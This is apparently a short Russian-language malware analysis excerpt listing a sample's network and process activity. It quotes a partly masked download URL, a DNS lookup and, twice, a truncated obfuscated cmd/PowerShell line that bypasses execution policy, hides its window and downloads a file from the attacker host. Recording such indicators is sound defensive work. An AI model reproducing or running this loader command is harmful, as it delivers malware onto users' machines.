Техническая информация
- http://ne###argoka.top/read.php?f=##### как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOW^eRShELL.^e^Xe -e^X^eC^u^t^i^oN^pol^i^C^y^ b^Y^Pass^ -^N^op^RO^fil^e ^-^w^iNDOWsty^LE ^hIDD^en (n^Ew^-obJecT sYstEM^.^Net.Webc^l^iE^nt)^.do^wNLOaD^FiL^E(^'http://ne###argoka....
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "pOW^eRShELL.^e^Xe -e^X^eC^u^t^i^oN^pol^i^C^y^ b^Y^Pass^ -^N^op^RO^fil^e ^-^w^iNDOWsty^LE ^hIDD^en (n^Ew^-obJecT sYstEM^.^Net.Webc^l^iE^nt)^.do^wNLOaD^FiL^E(^'http://ne###argoka....' (со скрытым окном)